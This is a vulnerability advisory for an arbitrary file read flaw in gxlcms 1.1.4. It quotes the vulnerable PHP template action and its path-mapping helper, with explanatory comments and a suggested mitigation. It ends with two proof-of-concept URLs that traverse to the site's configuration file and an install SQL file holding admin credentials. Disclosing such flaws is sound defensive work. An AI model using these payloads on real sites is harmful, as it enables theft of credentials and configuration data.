There is an arbitrary file read vulnerability in gxlcms1.1.4
Description:
There is an arbitrary file read vulnerability in /WWW/gxlcms/Lib/Common/Admin/function.php.
It allows an attacker to read arbitrary files.
Vulnerable code:
1. /www/Lib/Lib/Action/Admin/TplAction.class.php:
...
/**
 * Admin "add template" action: loads the template named by the `id` request
 * parameter and renders it in the edit form.
 *
 * Security note: `$filename` is built directly from `$_GET['id']` and is passed
 * to read_file() with no check that the resolved path stays inside the template
 * directory, so a request-controlled id decides which file is read. Whether an
 * authenticated admin session is required to reach this action is not shown here.
 * Mitigation would be to accept only a whitelist of known template names, or to
 * resolve the path and reject it unless it stays under the template directory.
 */
public function add(){
// '*' becomes '.', and admin_ff_url_repalce() maps '|' back to '/', so the id can
// carry both directory separators and dotted file names (e.g. '..' segments).
$filename = admin_ff_url_repalce(str_replace('*','.',trim($_GET['id']))); //Focus on the admin_ff_url_repalce function.
// Only emptiness is rejected; nothing about the path itself is validated.
if (empty($filename)) {
$this->error('模板名称不能为空!');
}
// Sink: the unvalidated path reaches the filesystem read here.
$content = read_file($filename);
$this->assign('filename',$filename);
// The file content is HTML-escaped before display, so this is a disclosure issue, not XSS.
$this->assign('content',htmlspecialchars($content));
$this->display('./Public/system/tpl_add.html');
}
...
2. /WWW/gxlcms/Lib/Common/Admin/function.php
....
/**
 * Transliterates URL-safe placeholder characters to/from path and query characters.
 *
 * With $order 'asc' (the default): '|' -> '/', '@' -> '=', '#' -> '&'.
 * With any other $order value: the inverse mapping '/' -> '|', '=' -> '@', '&' -> '#'.
 *
 * Note: when str_replace() is given arrays, the pairs are applied one after another
 * on the progressively replaced string. In 'asc' mode every '|' has already become
 * '/' by the time '||' is searched for, so the fourth pair never matches there.
 *
 * Security note: this is a pure character mapping. It does not reject '..' segments,
 * absolute paths or anything else, so any caller that uses the result as a filesystem
 * path must validate it against an allowed directory or name list before use.
 *
 * @param string $xmlurl value to transliterate
 * @param string $order  'asc' decodes placeholders into path characters; anything else encodes
 * @return string
 */
function admin_ff_url_repalce($xmlurl,$order='asc'){
// Loose comparison: any non-'asc' value selects the encoding direction.
if($order=='asc'){
return str_replace(array('|','@','#','||'),array('/','=','&','//'),$xmlurl);
}else{
return str_replace(array('/','=','&','||'),array('|','@','#','//'),$xmlurl);
}
}
...
POC:
http://127.0.0.1/index.php?s=Admin-Tpl-ADD-id-.|Runtime|Conf||config*php //Read the configuration file of the website
http://127.0.0.1/index.php?s=Admin-Tpl-ADD-id-.|Runtime|Install||install*sql //Read the administrator's password and account